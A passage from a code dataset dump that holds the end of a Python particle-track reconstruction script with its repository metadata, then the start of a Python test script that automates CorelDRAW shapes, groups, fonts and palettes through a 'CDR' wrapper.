ax=np.polyfit(z,x,2)[2]\n\n t2y=np.polyfit(z,y,2)[0]\n t1y=np.polyfit(z,y,2)[1]\n ay=np.polyfit(z,y,2)[2]\n\n bth.append(ax) #Append x intercept\n bth.append(t1x) #Append x slope\n bth.append(t2x) #Append a placeholder slope (for polynomial case)\n bth.append(ay) #Append x intercept\n bth.append(t1y) #Append x slope\n bth.append(t2y) #Append a placeholder slope (for polynomial case)\n del(bth[2])\n\n\n #Once we get coefficients for all tracks we convert them back to Pandas dataframe and join back to the data\n Bad_Tracks_Head=pd.DataFrame(Bad_Tracks_Head, columns = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID','ax','t1x','t2x','ay','t1y','t2y'])\n\n print(UF.TimeStamp(),'Saving the checkpoint file ',bcolors.OKBLUE+Bad_Tracks_CP_File+bcolors.ENDC)\n Bad_Tracks_Head.to_csv(Bad_Tracks_CP_File,index=False)\n else:\n print(UF.TimeStamp(),'Loading the checkpoint file ',bcolors.OKBLUE+Bad_Tracks_CP_File+bcolors.ENDC)\n Bad_Tracks_Head=pd.read_csv(Bad_Tracks_CP_File,header=0)\n Bad_Tracks_Head=Bad_Tracks_Head[Bad_Tracks_Head.ax != '[]']\n Bad_Tracks_Head['ax'] = Bad_Tracks_Head['ax'].astype(float)\n Bad_Tracks_Head['ay'] = Bad_Tracks_Head['ay'].astype(float)\n Bad_Tracks_Head['t1x'] = Bad_Tracks_Head['t1x'].astype(float)\n Bad_Tracks_Head['t2x'] = Bad_Tracks_Head['t2x'].astype(float)\n Bad_Tracks_Head['t1y'] = Bad_Tracks_Head['t1y'].astype(float)\n Bad_Tracks_Head['t2y'] = Bad_Tracks_Head['t2y'].astype(float)\n\n print(UF.TimeStamp(),'Removing problematic hits...')\n Bad_Tracks=pd.merge(Bad_Tracks,Bad_Tracks_Head,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'])\n\n\n\n print(UF.TimeStamp(),'Calculating x and y coordinates of the fitted line for all plates in the track...')\n #Calculating x and y coordinates of the fitted line for all plates in the track\n Bad_Tracks['new_x']=Bad_Tracks['ax']+(Bad_Tracks[PM.z]*Bad_Tracks['t1x'])+((Bad_Tracks[PM.z]**2)*Bad_Tracks['t2x'])\n Bad_Tracks['new_y']=Bad_Tracks['ay']+(Bad_Tracks[PM.z]*Bad_Tracks['t1y'])+((Bad_Tracks[PM.z]**2)*Bad_Tracks['t2y'])\n\n #Calculating how far hits deviate from the fit polynomial\n print(UF.TimeStamp(),'Calculating how far hits deviate from the fit polynomial...')\n Bad_Tracks['d_x']=Bad_Tracks[PM.x]-Bad_Tracks['new_x']\n Bad_Tracks['d_y']=Bad_Tracks[PM.y]-Bad_Tracks['new_y']\n\n Bad_Tracks['d_r']=Bad_Tracks['d_x']**2+Bad_Tracks['d_y']**2\n Bad_Tracks['d_r'] = Bad_Tracks['d_r'].astype(float)\n Bad_Tracks['d_r']=np.sqrt(Bad_Tracks['d_r']) #Absolute distance\n Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID,'d_r']]\n\n #Sort the tracks and their hits by Track ID, Plate and distance to the perfect line\n print(UF.TimeStamp(),'Sorting the tracks and their hits by Track ID, Plate and distance to the perfect line...')\n Bad_Tracks.sort_values([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,'d_r'],ascending=[0,0,1,1],inplace=True)\n\n #If there are two hits per plate we will keep the one which is closer to the line\n Bad_Tracks.drop_duplicates(subset=[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z],keep='first',inplace=True)\n Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.Hit_ID]]\n Good_Tracks=pd.concat([Good_Tracks,Bad_Tracks]) #Combine all ANNDEA tracks together\n Data=pd.merge(Data,Good_Tracks,how='left', on=[PM.Hit_ID]) #Re-map corrected ANNDEA Tracks back to the main data\n output_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/'+RecBatchID+'_RTr_OUTPUT_CLEANED.csv' #Final output. We can use this file for further operations\n Data.to_csv(output_file_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The tracked data has been written to\"+bcolors.ENDC, bcolors.OKBLUE+output_file_location+bcolors.ENDC)\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage 4 has successfully completed'+bcolors.ENDC)\n Status=4\n except Exception as e:\n print(UF.TimeStamp(),bcolors.FAIL+'Stage 4 is uncompleted due to: '+str(e)+bcolors.ENDC)\n Status=5\n break\nif Status==4:\n # Removing the temp files that were generated by the process\n print(UF.TimeStamp(),'Performing the cleanup... ',bcolors.ENDC)\n HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1a-\"+RecBatchID+\"\\\"\"\n UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1a_'+RecBatchID, [], HTCondorTag)\n HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1b-\"+RecBatchID+\"\\\"\"\n UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1b_'+RecBatchID, [], HTCondorTag)\n for p in Program:\n if p!='Custom':\n print(UF.TimeStamp(),UF.ManageTempFolders(p,'Delete'))\n print(UF.TimeStamp(), bcolors.OKGREEN+\"Reconstruction has been completed\"+bcolors.ENDC)\n exit()\nelse:\n print(UF.TimeStamp(), bcolors.FAIL+\"Reconstruction has not been completed as one of the processes has timed out or --ForceStatus!=0 option was chosen. Please run the script again (without Reset Mode).\"+bcolors.ENDC)\n exit()\n\n\n\n", "repo_name": "FilipsFedotovs/ANNDEA", "sub_path": "Code/RTr1_ReconstructTracks.py", "file_name": "RTr1_ReconstructTracks.py", "file_ext": "py", "file_size_in_byte": 42676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pandas.options", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 83, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 119, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 121, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 124, "usage_type": "call"}, {"api_name": "Parameters.stepX", "line_number": 128, "usage_type": "attribute"}, {"api_name": "Parameters.stepY", "line_number": 129, "usage_type": "attribute"}, {"api_name": "Parameters.stepZ", "line_number": 130, "usage_type": "attribute"}, {"api_name": "Parameters.cut_dt", "line_number": 131, "usage_type": "attribute"}, {"api_name": "Parameters.cut_dr", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.PickleOperations", "line_number": 134, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 143, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 151, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 153, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 155, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 156, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 157, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 160, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 162, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 164, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 165, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 168, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 169, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 169, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 171, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 172, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 173, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 174, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 175, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 176, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 177, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 178, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 183, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 185, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 195, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 197, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 200, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 202, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 203, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 214, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 216, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 220, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 222, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 227, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 229, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 240, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 242, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 245, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 247, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 253, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 256, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 258, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 259, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 260, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 274, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 277, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 278, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 285, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 287, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 301, "usage_type": "call"}, {"api_name": "UtilityFunctions.CreateCondorJobs", "line_number": 306, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 319, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 323, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 324, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 326, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 329, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 332, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 335, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 341, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 347, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 353, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 354, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 356, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 358, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 360, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 363, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 366, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 370, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 373, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 376, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 382, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 383, "usage_type": "call"}, {"api_name": "UtilityFunctions.SubmitJobs2Condor", "line_number": 385, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 388, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 391, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 394, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 400, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", "line_number": 402, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 423, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 423, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 425, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 425, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 438, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 438, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 440, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 440, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 453, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 453, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 455, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 455, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 461, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 462, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 481, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 485, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 486, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 488, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 490, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 491, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 494, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 494, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 502, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 502, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 510, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 511, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 519, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 521, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 521, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 521, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 523, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 524, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 524, "usage_type": "attribute"}, {"api_name": "Parameters.MinHitsTrack", "line_number": 525, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 527, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 528, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 530, "usage_type": "attribute"}, {"api_name": "Parameters.x", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.tx", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.ty", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 533, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 536, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 536, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 537, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 538, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 543, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 543, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 547, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 550, "usage_type": "call"}, {"api_name": "os.path", "line_number": 550, "usage_type": "attribute"}, {"api_name": "alive_progress.alive_bar", "line_number": 559, "usage_type": "call"}, {"api_name": "alive_progress.alive_bar", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 604, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 625, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 626, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 628, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 629, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 630, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 642, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 644, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 647, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 648, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 657, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 658, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 662, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 664, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 665, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 668, "usage_type": "call"}, {"api_name": "Parameters.x", "line_number": 669, "usage_type": "attribute"}, {"api_name": "Parameters.y", "line_number": 670, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 674, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 675, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 675, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 678, "usage_type": "call"}, {"api_name": "Parameters.z", "line_number": 679, "usage_type": "attribute"}, {"api_name": "Parameters.z", "line_number": 682, "usage_type": "attribute"}, {"api_name": "Parameters.Hit_ID", "line_number": 683, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 684, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 685, "usage_type": "call"}, {"api_name": "Parameters.Hit_ID", "line_number": 685, "usage_type": "attribute"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 688, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 689, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 692, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 697, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", "line_number": 699, "usage_type": "call"}, {"api_name": "UtilityFunctions.RecCleanUp", "line_number": 701, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 704, "usage_type": "call"}, {"api_name": "UtilityFunctions.ManageTempFolders", "line_number": 704, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 705, "usage_type": "call"}, {"api_name": "UtilityFunctions.TimeStamp", "line_number": 708, "usage_type": "call"}]} +{"seq_id": "36155917683", "text": "from cdr import CDR\nfrom PIL import Image,ImageDraw,ImageFont\nfrom fontTools.ttLib import TTFont\nfrom fontTools.ttLib.tables._c_m_a_p import CmapSubtable\n\n# 打开文档\ndef open():\n print(CDR('C:\\\\Users\\\\Administrator\\\\Desktop\\\\11.cdr'))\n\n# 获页面内容\n# 传递页面搜索\n# 不传,默认获取所有页面数据\ndef getContent(pageIndex=\"\"):\n print('返回', CDR().get(pageIndex))\n\n\n# 获取指定页面的全部内容字段\ndef setContent(pageIndex=\"\",path=\"\"):\n data = {'logo': {'pageIndex': 1, 'value': 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\1.png'}}\n CDR().set(data)\n\n\n# 页面页面,传递不同页面的索引 1开始, 第一页1,第二页2\ndef togglePage():\n print(CDR().togglePage(2))\n \n\n# 创建边界三角形\ndef drawDecorationTriangle():\n # CDR().groupDecorationTriangle()\n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"right\":600},'righttop') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"left\":600},'leftbottom') \n CDR().drawDecorationTriangle(\"test\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n\n\n#测试图片裁剪\ndef testPowerClip():\n d1 = CDR()\n layer = d1.getLayer(\"秒秒学装饰\")\n # 必须设置活动的layer,这样调用vb.exe才会在这个layer的内部\n layer.Activate()\n imgShape = d1.addImage(layer,\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\111\\\\1.png\")\n #设置单位像素\n d1.doc.Unit = 5\n ellipse = layer.CreateEllipse(100, 100, 500, 500)\n imgShape.AddToSelection()\n imgShape.AddToPowerClip(ellipse)\n\n\n# 测试分组\ndef testGroup():\n cdrObj = CDR()\n layer = cdrObj.getLayer(\"秒秒学装饰\")\n s1 = layer.FindShape(\"test1\")\n s2 = layer.FindShape(\"test2\")\n s3 = layer.FindShape(\"test3\")\n s4 = layer.FindShape(\"test4\")\n\n # 创建4个边界三角形\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n if s2 == None:\n s2 = cdrObj.drawDecorationTriangle(\"test2\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n if s3 == None:\n s3 = cdrObj.drawDecorationTriangle(\"test3\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n if s4 == None:\n s4 = cdrObj.drawDecorationTriangle(\"test4\",{\"background-color\":[255, 0, 0]},{\"top\":300,\"right\":600},'rightbottom') \n\n\n# 测试组对象移动\ndef addShapeToGroup():\n cdrObj = CDR()\n layerObj = cdrObj.getLayer('秒秒学装饰')\n g1 = cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n g4 = cdrObj.groupShapeObjs(layerObj,\"子���占位组3\",g3)\n\n s1 = layerObj.FindShape(\"test1\")\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n # 增加一个对象到组\n cdrObj.addShapeToGroup(g4,s1)\n\n\n# 从组中删除一个对象,维持组的持久性\ndef removGroupShapeObjs():\n cdrObj = CDR()\n layerObj = cdrObj.getLayer('秒秒学装饰')\n g1 = cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n g4 = cdrObj.groupShapeObjs(layerObj,\"子组占位组3\",g3)\n\n s1 = layerObj.FindShape(\"test1\")\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n # 增加一个对象到组\n cdrObj.addShapeToGroup(g4,s1)\n # 从组中删除一个对象,但是保持组的持久性\n cdrObj.removGroupShapeObjs(g4,s1)\n\n\n# 从组中删除一个对象,不维持持组的持久性\ndef deleteGroupShapeObjs():\n cdrObj = CDR()\n layerObj = cdrObj.getLayer('秒秒学装饰')\n g1 = cdrObj.groupShapeObjs(layerObj,\"占位组\",)\n g2 = cdrObj.groupShapeObjs(layerObj,\"子组占位组1\",g1)\n g3 = cdrObj.groupShapeObjs(layerObj,\"子组占位组2\",g2)\n g4 = cdrObj.groupShapeObjs(layerObj,\"子组占位组3\",g3)\n\n s1 = layerObj.FindShape(\"test1\")\n if s1 == None:\n s1 = cdrObj.drawDecorationTriangle(\"test1\",{\"background-color\":[255, 0, 0]},{\"bottom\":300,\"left\":600},'lefttop') \n\n # 增加一个对象到组\n cdrObj.addShapeToGroup(g4,s1)\n cdrObj.deleteGroupShapeObjs(g4,s1)\n\n\n# 移动对象\ndef moveToMiddle():\n cdrObj = CDR()\n # cdrObj.moveToLandscapeMiddle(\"测试1\")\n # cdrObj.moveToLeft(obj)\n # cdrObj.moveToRight('测试1')\n # cdrObj.moveToTop('测试1')\n # cdrObj.moveToBottom('测试1')\n # cdrObj.moveToVerticalMiddle('测试1')\n cdrObj.moveToCenter('测试1')\n\n\n# 字体尺寸修改\ndef increaseFontSize():\n cdrObj = CDR()\n cdrObj.loadPalette('C:\\\\Users\\\\Administrator\\\\Desktop\\\\123\\\\cw.xml')\n # cdrObj.addFontSize('测试1',24)\n # cdrObj.reduceFontSize('测试1',15)\n # cdrObj.setColor('测试1',[255,0,0])\n\ndef testColor():\n cdrObj = CDR()\n # cdrObj.setColor('测试1',[255,0,0])\n cdrObj.createPage(5)\n\n\n# 组合测试\ndef combineTest():\n cdrObj = CDR()\n obj = cdrObj.insertParaText([0, 0, 120, 500],'测试1','我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf1111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf111111')\n cdrObj.setColor(obj,[255,0,0])\n cdrObj.addFontSize(obj,24)\n cdrObj.moveToCenter(obj)\n cdrObj.modifyParaText(obj,'dfs123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111我是内容123123大1sdfasfsfsdf2312dfsadfsfsdf11111',[5, 50, 100, 50],'','')\n cdrObj.setFontSize(obj,10)\n\n\n #创建调色版,并增加颜色对象\ndef paletteTest1():\n cdrObj = CDR()\n paletteObj = cdrObj.accessPalette('my') \n cdrObj.setPletteEnabled(paletteObj) #启用\n # 创建一个颜色对象,使用指定格式\n color = 